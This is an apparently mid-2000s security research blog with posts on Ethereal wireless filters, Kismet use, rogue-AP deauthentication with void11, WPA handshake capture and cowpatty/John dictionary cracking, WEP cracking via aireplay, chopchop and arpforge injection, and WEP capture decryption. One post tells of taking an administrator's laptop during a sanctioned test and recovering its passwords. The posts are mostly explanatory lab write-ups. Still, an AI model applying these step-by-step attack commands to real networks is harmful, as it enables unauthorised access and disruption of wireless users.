From Rexploit

[-=] Research Blog [=-]

Posted here will be our technical rantings. Check on a regular basis for new material. For all forum replies on topics here please use the post date as the subject to keep things orderly and easier to find.

.: Friday, September, 2 - Ethereal Wireless Filters :.

.: Posted by William :.

It's been a while since I've posted but here I am. I'm about to start on adding videos and posts on a monthly basis now. I'll be focusing on Cisco network hijinks but just to restart the blog here I'll start with Ethereal wireless filters since I've been using these lately. I could not find a reference manual or anything of that sort to point out what filters showed what so I've made my own. If you deal with wireless on a daily basis the filters shown below are a lifesaver.

Now, 802.11 wireless uses three types of frames:

• Management - are used to control the joining and leaving of a BSS
• Control - acknowledge the reception of incoming data frames
• Data - contain upper-layer data

The corresponding display filter syntax for each type is as follows:

Management Frames
wlan.fc.type == 0

Control Frames
wlan.fc.type == 1

Data Frames
wlan.fc.type == 2

There are eleven types of management frames:

• Association request frame
• Association response frame
• Reassociation request frame
• Reassociation response frame
• Probe request frame
• Probe response frame
• Beacon frame
• ATIM frame
• Disassociation frame
• Authentication frame
• Deauthentication frame

I will only discuss the relevent frames and filters that correspond to them. By displaying only specific packets you can analyze specific frame types for any errors or misconfigurations that you might have on your wireless network or harvest information from a nearby wireless network for pentesting purposes of course ;-).

Association Request Frames
wlan.fc.type_subtype == 0

Association Response Frames
wlan.fc.type_subtype == 1

Probe Request Frames
wlan.fc.type_subtype == 4

Probe Response Frames
wlan.fc.type_subtype == 5

Beacon Frames
wlan.fc.type_subtype == 8

Here is a useful tip for this filter type it in but add an exclamation point at the beginning and it will filter out and exclude all beacons and leave you with the more useful frames.

!wlan.fc.type_subtype == 8

Authentication Frames
wlan.fc.type_subtype == 11

Deauthentication Frames
wlan.fc.type_subtype == 12

I hope this helps as a good reference.

~Will

.: Sunday, May, 30 - Kismet Primer Guide :.

.: Posted by William :.

This is a quick and dirty shakedown of the Kismet interface and key shortcuts. The key for the command will be presented followed by its description in parenthesis. Before continuing it is important you sort the network list so you can select networks. Press the S (Sort) key and choose how you want the network list organized by pressing the key that corresponds to the sort method.

Below is a screenshot of kismet showing three different types of networks.

- Two Encrypted Networks (SSID: 2WIRE521, 2WIRE514) using WEP

- One Hidden Encrypted Network (SSID: Zemfira) using WPA

- One unencrypted network with no SSID

Interface Overview

Ok using the above image as reference starting from left to right the Kismet basic interface consists of:

- Name : SSID of network

- T : Type of network

- W : Identifies if network is secured or not

- Ch : Channel on which the Access Point is on

- Packts : Number of packets captured

- Flags : Method in which IP was gathered (ex. A4 means IP was learned through ARP packet)

- IP Range : IP of the network

- Size : Total size of packets gathered from the Access Point

Identifying Security

Secured networks are always shown in green and the W column shows either Y (Yes) for WEP or O (Other) if any another type of security is used such as WPA/TKIP/LEAP/EAP/TLS. When you see an O in the W column select the network and press the I (Network Information) key and scroll down to the Encrypt : field and the specific type of security used is listed.

Color Coding

Kismet colors the networks listed to make it easier to identify its configuration. The following are the possible color combinations:

- Yellow : Unencrypted network

- Red : Networks this color are still using factory defaults

- Green : This identifies secured networks using either WPA, WEP, or another form of security

- Blue : These are hidden networks which can either be open or encrypted so check the W column

Network Type

The T (Type) column can list six possible wireless network types.

- A (Access Point) - normal wireless access point

- H (Ad-Hoc) - ad-hoc point-to-point wireless network

- P (Probe request) - A wireless client that is not associated but is searching for a network

- D (Data) - Data network

- T (Turbocell) - Turbocell network

- G (Group) - Group of wireless network. Not exactly a network type but you have the option to group networks together

Additional List of Options

Kismet has oodles of options to use so here is a command reference that is self explanatory.

e - Open popup window of Kismet servers. This lets you simultaneously monitor two or more Kismet servers on different hosts.

z - Zoom network display panel to full screen (or return it to normal size if it is already zoomed)

m - Mute sound and speech if they are enabled (or unmute them if they were previously silenced). You must have sound or speech enabled in your config to be able to mute or unmute them.

t - Tag (or untag) the current network

g - Group currently tagged networks

u - Ungroup current group

c - Open client popup window to display clients in the selected network

n - Rename selected network or group

i - Display detailed information about the current network or group

s - Sort the network list differently

l - Show signal/power/noise levels if the card reports them

d - Instruct the server to start extracting printable strings from the packet stream and display them.

r - Display bar graph of the packet rate.

a - Show statistics about packet counts and channel allocation.

p - Display packet types as they are recieved.

f - Follow the estimated center of a network and display a compass

w - Display all previous alerts and warnings.

~William

.: Sunday, May, 22 - 802.11b attacks on 802.11g :.

.: Posted by William:.

This is a follow up to the Aireplay injection blog post in which I explained how I was able to perform WEP cracking using aireplay by attacking an 802.11g network with an 802.11b card. My results were sporadic but soon I figured out why. The type of modulation used by an access point is the main factor that determines if will be able to see 802.11g station traffic on your 802.11b card. Both 802.11b and 802.11g use the same frequency and channels so the potential for a 802.11b station signal to collide with an 802.11g station signal exists. When an access point sees a mixed environment it will start to use protection mechanisms to prevent DSSS transmissions (802.11b) from colliding with OFDM transmissions (802.11g). A mode that can be used is DSSS-OFDM in which the preamble and PLCP low level headers are modulated using DBPSK or DQPSK and then the rest of the packet is sent in OFDM. 802.11b stations can now see the low level headers so no collisons will occur now. If only 802.11g stations exist ERP-OFDM will be used to modulate the entire packet in pure 802.11g networks and in this scenario a 802.11b sniffing will not see anything.

802.11g uses OFDM modulation to achieve 54mbps data rates while 802.11b utilizes DQPSK (Differential Quaternary 
Phase Shift Keying) to reach 11mbps rates with the proper encoding and DBPSK (Differential Binary Phase Shift 
Keying) for a rate of 1Mbps. The entire inner workings of 802.11 are a bit more complicated and this is just a 
simplified explanation.

Let say you use an SMC2532W-B or any other prism 2.5 based card to sniff on network with 802.11g stations. At first you will not see anything because all that exists are 802.11g stations and ERP-OFDM mode will be used, but lets say a 802.11b station associates to the access point. This will cause the access point to use DSSS-OFDM mode to prevent collisions and now your 802.11b station will see -only- the low level headers on the packet. If you were using aireplay to capture and reinject a packet you will see the packet but when you replay it will not work because you are only replaying headers. Now lets say more 802.11b stations associate, the access point may decide to switch to a different modulation scheme for maximum compatibility and less overhead such as DQPSK or DBPSK which will bring down the data rate of 802.11g stations on the same level as 802.11b stations and now your 802.11b running with aireplay will see the entire packet and injection will be successful. Another scenario in which you could sniff and 802.11g stations traffic would be if the station were far enough from the access point that it would have to drop data rates and use a more robust modulation technique such as DQPSK or DBPSK again your 802.11b card will sniff successfully.

If you were to use aireplay with a 802.11g card such as a Netgear WG511 and then replay the packet or chopchop it with a 802.11b prism card (SMC2532W-B is a good example) the 802.11b card will successfully inject or chopcop it because the packet was originally captured by a 802.11g card which captured the entire packet. I highly recommend that you all read about the modulating and encoding techniques of 802.11 to learn how 802.11 works at the physical layer.

I recommend the following two books as excellent resources:

802.11 (Wi-Fi) Networking Handbook (http://www.amazon.com/exec/obidos/ASIN/0072226234/qid%3D1116798187/sr%3D11-1/ref%3Dsr%5F11%5F1/104-0889385-2995116)

CWNA Official Study Guide (http://www.amazon.com/exec/obidos/ASIN/0072255382/qid%3D1116798267/sr%3D11-1/ref%3Dsr%5F11%5F1/104-0889385-2995116)

~William

.: Monday, May, 16 - Void11 Rouge Access Point Counter-Offense :.

.: Posted by William :.

After looking at many high priced solutions for wireless protection the one feature they all had was the ability to prevent hosts from authenticating to a rouge access point. All that was used was to send a deauth frame to knock the station off and we already know something that can do this! Detection of rouge access points can be done with Kismet easily enough but using Void11 as an active defense in response is better. You have all used void11 for deauthenticating hosts on an access point(s) but let us use it in a more constructive way. You can create a text file with BSSID and SSID entries and have void11 either deny or permit the entries listed. Void11 calls this a matchlist. When a rouge access point comes online its SSID or BSSID will compared against the matchlist and void11 will promptly deauthenticate any host that associates to it. By default void11 will permit all entries in a matchlist.

To specify entries within a matchlist the following syntax is used: (Put an empty new line after each entry)

Match BSSID:

B:00:09:5B:23:A4:9E

Match SSID:

S:AP_1

Create a matchlist with all the BSSIDs and SSIDs of your access points. Here is an example. Assume you have four access points with the BSSID's of:

BSSID #1: 00:09:5B:FE:80:4A
BSSID #3: 00:09:5B:3A:1C:01
BSSID #3: 00:09:5B:6E:F2:E6
BSSID #4: 00:09:5B:22:A3:E2

Also the SSID is:

SSID: Krasnaya

Put both the SSID and BSSID's of the access points into a text file that looks like the following:

S:Krasnaya

B:00:09:5B:FE:80:4A

B:00:09:5B:3A:1C:01

B:00:09:5B:6E:F2:E6

B:00:09:5B:22:A3:E2

Save the text file with the name matchlist.

Now it is time to run void11. You will require a prism 2/2.5 wireless card running with the hostap drivers. The steps to configure the prism card and void11 are:

1) Use hostap drivers

switch-to-hostap

Eject and reinsert your card.

2) Prepare card to use void11

iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master

3) Start channel hopping and void11

Channel Hopping

void11_hopper >/dev/null &

Void11

void11_penetration -l matchlist -D wlan0

(ignore the ioctl[PRISM_IOCTL_HOSTAPD]: Invalid argument error, void11 will still function)

.: Shortfalls :.
----------------
A skilled wireless hacker could simply spoof his rouge AP's SSID and BSSID with a valid one that is sniffed   
using Kismet and evade the void11 defense, but the use of the same BSSID creates the presence of a duplicate
BSSID and using Kismet you can detect it. As a temporary solution you could change the SSIDs, if possible, to 
knock clients of the rouge access point but this solution is difficult on large scale wireless networks. In the
end though it becomes a game of cat and mouse to find the location of the rouge access point.

Now when any client attempts to associate to a rouge access point it will be kicked off it leaving the rouge ap useless. Some ideas for a practical deployment would be to utilize a notebook computer with a high power wifi card. Either a Senao NL-2511 or SMC2532W-B with a either an external omni or directional patch antenna to provide extended coverage. Maybe two antennas using both connectors on the card would work also. I will work on a script to automate void11 setup for use as a startup script to make this type of solution more reliable.

~William

.: Friday, May, 6 - WPA Cracking and Kismet/GPS Extras :.

.: Posted by William :. and .: Posted by Re@lity :.

With WEP conquered it's time to move on to it's successor... WPA! The following explains cowpatty usage and some interesting notes on WPA. The end of the post has a primer on using a GPS, Kismet, and gpsdrive.

Equipment

Note: You do not need the exact equipment listed here to try a WPA attack. Any prism or atheros card will work for monitoring and deauthenticating.

The equipment I used for the WPA testing is: - Netgear WG511 (prismGT) - Cisco Aironet CB21AG-A-K9 A/B/G card (Used wpa_supplicant to authenticate to access point) - Netgear WGR614 Wireless Router (set to channel 8)

Configuration

The Netgear WG511 was set into monitor mode and ran Ethereal to monitor traffic:

ifconfig eth0 up iwconfig eth0 mode monitor channel 8

The WPA client card was the Cisco card and wpa_supplicant was used.

wpa_supplicant.conf configuration

network={
ssid="Zemfira"
proto=WPA
key_mgmt=WPA-PSK
psk="alsurules"
scan_ssid=1
}

wpa_supplicant command

wpa_supplicant -i ath0 -c /etc/wpa_supplicant.conf -D madwifi

The access point was simply set to WPA-PSK with the passphrase alsurules and put on channel 8.

Interesting Observations

Many of you might have tried to use cowpatty without much success because it gave an error message on how a 4-way handshake was not found and that is because of some strange behavior between the client and access point when initiating WPA authentication for the first time. I set the WG511 card to monitor channel 8 then inserted the Cisco card and ran wpa_supplicant but would only receive two EAPOL frames instead of the four required by cowpatty. Now that the card was authenticated I deauthenticated it with the WG511 then I got the entire four-way handshake. Only after the card was authenticated and I kicked it off would I get the four-way handshake so I decided to look into this and the results were interesting.

When you run wpa_supplicant it looks for the Access Point but the configuration file does not specify a channel so an authentication request is sent on each channel until the Access Point point responds then the WPA authentication proceeds but initial WPA authentication is spread over a few channels (this is explained below). Now the Access Point I used would broadcast its presence over a range of 9 channels. Channel 8 was set on the Access Point but it broadcasted beacons out on channels 4 thru 12 so the initial WPA authentication was spread over that range of channels. To explain this in further detail it seems a predefined range is used by the Access Point, a Netgear WGR614 in this test, to listen for clients. Four channels above and below the main channel are used always.

PLEASE VERIFY THIS ON YOUR ACCESS POINTS. POST BRAND AND MODEL AND IF THE RANGES ARE CONSISENT. POST RESULTS IN 
FORUM.

Example

If channel 8 is used channels 4, 5, 6, 7, 8, 9, 10, 11, 12 are used (9 channels in all) but do you see how its four channels above 8 that are used 9,10,11,12 and four channels below the main channel 4,5,6,7. This is always the case.

So if the channel is set to channel 11 then the range would be 6, 7, 8, 9, 10, 11, 12, 13, 14.

This explains why many of you could not get cowpatty to find the complete four-way handshake since it was spread across a range of channels. So the only solution is to deauthenticate an already authenticated station and capture the WPA re-authentication. This will work because after the initial WPA authentication the card will be set on the Access Points main channel, which is the channel on which the WG511 is monitoring, and the problem of the WPA authentication being spread over a range of channels is nonexistent.

To test the range of channels your Access Point broadcasts itself on set a card into monitor mode and run Ethereal. Change the channel on which your card monitors incrementing from channel 1 to channel 14 and record on which channels you see your Access Point broadcasting beacons.

The Attack

The attack consists of running running Ethereal with the WG511 to capture traffic on the Access Point channel. Authenticate a station to your Access Point using wpa_supplicant. I used my WG511 card to monitor and inject traffic you can use an atheros card or prism card (with wlanng drivers) to do the same.

1) Create a deauthentication packet with airforge:

airforge 00:09:5E:3C:80:31 00:23:3A:4F:10:11 deauth.cap

Syntax: airforge <bssid> <dst mac> <packet-name>

With airforge specify the bssid, mac address of who you want to deauthenticate, and name the packet.

2) Inject deauth.cap packet with aireplay:

aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.cap eth0

Syntax: aireplay -r <packet> <interface>

Input name of the packet created with airforge and the interface on which you want to inject in this case the same one that is monitoring. Let aireplay inject for abou 10 seconds then stop it.

3) In Ethereal type EAPOL in the display filter dialog and if all goes well you should see four EAPOL packets. The handshake consists of four specific packets. Expand the 802.1x Authentication tree and then the Key Information subtree. This portion of the packet contains the specific options we are looking for.

The four-way handshake consists of the following four packets. Take note of the Key Information since the values must match the packets you receive.

Packet One (http://new.remote-exploit.org/images/1/15/5-6-05_eapol_1.jpg)

Packet Two (http://new.remote-exploit.org/images/1/1c/5-6-05_eapol_2.jpg)

Packet Three (http://new.remote-exploit.org/images/e/e7/5-6-05_eapol_3.jpg)

Packet Four (http://new.remote-exploit.org/images/9/9d/5-6-05_eapol_4.jpg)

Cowpatty uses packets 2 thru 4 to attack WPA. Cowpatty identifies the passphrase used to generate the PMK and packets 2 thru 4 provide the necessary info to carry out the attack. Many articles exist on how WPA authenticates so I will not go into detail on how it actually does it go here http://wifinetnews.com/archives/002452.html for info on WPA weakness.

Once you have he four requires packets save the packet capture.

4) Using cowpatty to bruteforce passphrase:

cowpatty -f dictionary.txt -r capture.cap -s Zemfira

Syntax: cowpatty -f <dict-file> -r <pcap file> -s <network-ssid>

Specify your dictionary file then the saved packet capture and most importantly the SSID of the network. The SSID must be correct if not the PMK generation will be off. If all goes well and a you have the correct word within your dictionary file cowpatty will give you the passphrase.

Utilizing John the Ripper to Enhance Cowpatty
John can be utilized to create permutations of the words within a dictionary file to increases the chances of   
guessing the password with cowpatty. Using John will yield forty-nine permutations per word.
The commands are:
john -w:dictionary.txt -rules -session:johnrestore.dat -stdout:63 | cowpatty -r capture.cap -f--s Zemfira
Syntax:
john -w:<word-file> -rules -session:johnrestore.dat -stdout:63 | cowpatty -r <pcap-file> -f--s <ssid>

Identifying WPA Networks

To identify WPA networks just run Kismet from the latest Auditor release. Previous versions of Kismet either present a Y for WEP encrypted networks or N for non-WEP encrypted networks, but in the new version of Kismet an O is presented for encrypted networks not using WEP. Simply select the network and press I (information command) and view the Encrypt: field and if you see WPA then you got a WPA network.

GPS Use with Kismet and gpsdrive

Here is a quick guide to configuring a GPS for use with Kismet and how to configure gpsdrive to use Kismet's GPS info to plot Access Points on its map.

1) Configure your GPS:
Syntax entered is case sensitive!!
- Press ALT+F2 enter the command start-gps-daemon - Enter GPS device location and baud rate. Valid device location(port) are /dev/ttyUSB0 for USB GPS's and /dev/ttySx for serial GPS's where x is the serial port number. The baud rate on most GPS devices is 4800. - To confirm you are receiving data on your shell type telnet localhost 2947 and once you connect press r and enter and if the device location(port) and buadrate are correct you shoud see raw GPS data being output. The output will look similar to this

GPSD,R=1
$PRWIRID,12,01.05,07/29/96,0003,*46
$GPRMC,235247,V,4333.1694,N,10813.0065,W,0.000,0.0,120815,12.3,E*42
$PRWIZCH,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0,00,0*4D

2) Configure SQL database:

Gpsdrive uses a SQL database in conjuction with Kismet to gather the necessary information to plot Access Points on its map.

- Start the mysql service

/etc/init.d/mysql start

- Go to the /usr/share/doc/gpsdrive directory within this directory is the create.sql database template. Create sql database using the template:

mysql < create.sql

3) Start Kismet and then gpsdrive. In gpsdrive check the Use SQL option on the left tab.

Gpsdrive should begin to plot the Access Points on its map!

Note: Close gpsdrive first before you close Kismet or else gpsdrive will hang!

To delete the database and create a new one or to backup your database:

- The mysql database file is within the folder /var/lib/mysql/geoinfo
- To create new database delete the geoinfo directory and proceed through steps 1 thru 2 again.
- To backup just copy the folder to another directory

~ William & Re@lity

Note: This WPA usage of "multi-channel" broadcasting is an interesting issue.
I would like to assess the behaviour further with other AP's, regarding any emerging patterns of channel usage.
Particularly interesting is how the AP or client responds when the chosen channels are not available (blocked, etc).
I'd like, eventually, to test & document here MitM/bridging variations that may be possible with WPA.
Please post to forum (http://forum.remote-exploit.org/index.php) any info about your WPA experiments, etc.
Thanks -  Re@lity.

.: Wednesday, April, 27 - WEP Decryption and Physical Intrusion :.

.: Posted by William :.

I was thinking the other day "Ok, I cracked the WEP key and I can login to the network, but what about these encrypted packet captures?". Well I looked into it and managed to decrypt packet dumps and sniff a network with WEP without associating (Assuming I have the WEP key). Also, I have a story on the importance of physical security!

WEP Decryption

Three tested methods exist to decrypt WEP encrypted packet dumps.

1) decrypt tool that is included with airsnort 2) Ethereal 3) Kismet

decrypt tool

This program will decrypt saved packet dumps and remove the beacons within for an easier to read packet dump. You can provide the known WEP key or provide a file with WEP keys to attempt to find the correct key.

decrypt -p 1E:A5:A5:6D:28:F5:20:B6:60:23:E2:42:11 -b -m 00:09:5B:FE:80:1C -e encrypted.pcap -d decrypted.pcap

Syntax: decrypt -p <WEP-KEY> -b -m <BSSID> -e <infile> -d <outfile>

When entering the WEP key make sure you seperate it with colons like the example above. The -b option removes beacons out of the packet dump. The BSSID of the network to decrypt is specified and the encrypted packet dump is specified and the desired output name added.

Ethereal

Using Ethereal you can (a)decrypt packet dumps and (b) decrypt packets on the fly without associating to the wireless network. This is the most convenient solution out of all the three.

Open Ethereal then select EDIT -> PREFERENCES -> PROTOCOLS -> IEEE 802.11

Enter your WEP key into 'WEP key #1' box. Select 1 in the 'WEP key count' and check the 'Assume packets have FCS:' and click 'OK'. Any packets captured now will be decrypted and previously captured packets. You can add more WEP keys for Ethereal to use and if you do add more increase the 'WEP key count' value.

Kismet

Kismet also provided on the fly decryption of WEP encrypted traffic like Ethereal. Open the /usr/local/etc/kismet.conf file with an editor and add the wepkey directive as so: wepkey=00:09:5B:FE:80:1C,1EA5A56D28F520B66023E24211

Syntax: wepkey=<BSSID>,<WEP KEY>

Multiple wepkey entries can be used to decode multiple networks.

Physical Intrusion

Now for the story! Physical security is of utmost importance and everybody can do it. Names and locations of story are different to prevent public embarrasment and so on.

At work I was asked by my supervisor to test network security in a "new" without exploiting devices or misconfigurations. I decided on taking a physical approach to it for a change. It was lunch time and the vending machines were on the way so I nabbed a quick snack. So off I head toward the IT offices and server room with a chocolate bar in hand and come up to the first obstacle, a door with a card swipe lock, it usually never works and I turn the handle and the door opens! I'm now walking past the IT offices but all the doors are locked it seems everybody went out to lunch. It is good they are all out since no one is around but the doors are locked. I head toward the IT help desk since it is not office but more of a receptionist desk near the back of the building. I arrive and the help desk geek is out to lunch also so I decide to look around. When employees have problems with there laptops the help desk geek submits a request for repair and stores the laptop in a cabinet until the PC techs can come by to pick them up. Well I try the cabinet and lo and behold it's unlocked! About six laptops populate the cabinet all high end models. I spot a Sony VAIO with Cisco decals on it and remember that this is the Network Administrators laptop. Apparently having Cisco decals on your laptop makes you an expert on all things networking. Anyways, I grab the laptop and go out to lunch with my supervisor with the laptop in hand. We go to lunch to a cafe next to our workplace to be within range of the corporate wireless network. We're both laughing at how we have the network adminsitrators laptop and he ask me to see what I can harvest out of it. I turn on the laptop and boot it up with my ERD Commander CD and quickly reset the administrator password. Once reset I log into Windows XP and start to snoop around. On the desktop there is an icon named "AirMagnet Console" I inform my supervisor on this and he says to attempt to break into it since here at work its a high profile piece of software that is supposed to be well secured. I connect to the corporate network and start up AirMagnet and receive a connect dialog and list of usernames to choose from and I select the network administrators account but as the login procedure starts I receive an error saying the software version is out of date and then closes the application opens a browser and requests a username and password to log into the web management console. In the connect dialog the username is visible in plaintext but the password is in ****** mode and I cant cut and paste the password into the web login. I remember a feature available in the Cain & Abel program that presents the ****** password in cleartext. I download Cain & Abel and run the decrypt utility and I now have the password. I attempt to reconnect to have the program open the browser then promptly enter the username and password and I'm in. With the password and username I have complete control of the AirMagnet infrastructure. My supervisor just laughs, we finish up our lunch and head back to work. That same day he has a meeting with the heads of IT including the network administrator. I can only imagine how many heads will roll for this considering there is a "zero tolerance" policy regarding security.

That's all for today! Time to start collecting info for the next post.

~William

.: Sunday, April, 24 - Aireplay injection :.

.: Posted by William :.

The .: Sunday, May, 22 - 802.11b attacks on 802.11g :. post is a follow up on cracking 802.11g networks with an 802.11b card.

Well I've been doing some testing with the new aireplay and I managed to inject with all drivers. A couple of things came up that were interesting I managed to deauthenticate a 802.11g client with a 802.11b card and crack WEP on an all 802.11g network with a 802.11b card (Captured the traffic with a 802.11g card first).

For the deauthentication I used a Cisco Aironet CB21AG-A-K9 (Atheros card) to connect to a Netgear WGR614 access point and set both to 802.11 g mode only. I used a SMC2532W-B 802.11b card (Prism 2.5 card) to deauthenticate the 802.11g stations. To ensure I was actually deauthenticating stations I used wavemon to monitor my Cisco card which was associated to the AP.

Following settings were used:

Cisco Card

- iwpriv ath0 mode 3 (G mode only)

SMC Card

- Used wlanng drivers for aireplay
- hostap drivers for void11 with commands:
1) iwpriv wlan0 hostapd 1
2) iwconfig wlan0 mode master channel <channel>

Commands issued:

Created deauthentication packet using airforge:

airforge <BSSID> <SRC MAC> deauth

Then injected using the 802.11b card:

aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth wlan0

Used void11 mass deauthentication with hostap drivers:

void11_penetration wlan0

Ignore the 'ioctl[PRISM2_IOCTL_HOSTAPD]: Invalid argument' error void11 will still work.

My 802.11g station dropped like a brick.

I managed also to crack WEP on an all 802.11g network with my SMC2532W-B 802.11b card. I noticed something strange I sniff traffic with aireplay with my 802.11b card and sometimes manage to capture traffic from the 802.11g network. I am not sure if this is due to the encoding or what, but I have captured and replayed 802.11g traffic with my 802.11b card alone. I usually capture with my Netgear WG511 (PrismGT card) and then crack the packet with chopchop with my 802.11b SMC card.

Cracking 802.11g network with 802.11b card Used same equipment as mentioned in the beginning plus Netgear WG511 802.11g card

Captured packet using aireplay:

aireplay -i eth1 (Also sometimes I could use the 802.11b SMC card to capture traffic. Why? Not sure yet.

Used chopchop to crack using 802.11b card:'

chopchop only works with prism based card
chopchop -i wlan0 -b <BSSID> -m <SRC MAC> -p <aireplay packet>

Utilized arpforge to create new packet:

arpforge <iv. file> 1 <bssid> <mac src> <ip src> <ip dst> fakearp

Inject new packet using 802.11b card: aireplay -r fakearp wlan0

The IV count would rise.

The number of packets can sent by aireplay can be adjusted with the -x option. The default value is 256 but 
modifying switch will yield better results. Results differ with different number of packets sent per second. 
Experiment with the packet send count value. Between 1500 and 2000 seems to be the sweet spot.

aireplay -r fakearp wlan0 -x 1500

- Thnks to radi0head and re@lity for this.

Please test my results to verify that they are consistent with your equipment. As for 802.11b capturing 802.11g traffic it is strange. I set my Cisco Atheros card to G-mode only with iwpriv ath0 mode 3 and my netgear AP is set to G-mode only also please test this too. Post your results on the forum and use the date of this post as the title.

~William